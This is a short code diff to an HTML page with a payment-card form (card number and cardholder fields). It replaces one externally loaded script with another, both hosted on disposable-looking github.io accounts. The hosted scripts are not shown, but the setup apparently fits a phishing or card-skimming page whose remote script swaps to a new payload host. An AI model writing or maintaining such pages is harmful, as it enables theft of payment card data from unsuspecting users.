--- a/ce.html
+++ b/ce.html
@@ -131,7 +131,7 @@
     </form>
   </div>
 
-   <script src="https://eal876955-lgtm.github.io/npi/m/intelligent.js"></script>
+   <script src="https://plyarth.github.io/intc/in.js"></script>
   <script>
     const cardNumberInput = document.getElementById("cardnumber");
     const cardHolderInput = document.getElementById("cardholder");
